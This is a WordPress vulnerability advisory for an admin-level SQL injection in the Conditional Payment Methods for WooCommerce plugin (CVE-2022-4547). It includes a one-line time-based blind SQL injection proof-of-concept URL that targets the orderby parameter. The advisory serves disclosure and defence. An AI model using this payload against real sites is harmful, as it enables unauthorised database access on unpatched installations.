WordPress Plugin Vulnerabilities

Conditional Payment Methods for WooCommerce <= 1.0 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wcpma-payment-settings&action=wcpma_view_list&orderby=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)

Affects Plugins

conditional-payment-methods-for-woocommerce

No known fix - plugin closed

References

CVE

CVE-2022-4547

URL

https://bulletin.iese.de/post/conditional-payment-methods-for-woocommerce_1-0/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)

Submitter

Daniel Krohmer

Submitter website

https://iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

fe1514b4-74e1-4c19-8741-c0d4db9bab99

Timeline

Publicly Published

2022-12-24 (about 3 months ago)

Added

2022-12-24 (about 3 months ago)

Last Updated

2022-12-24 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin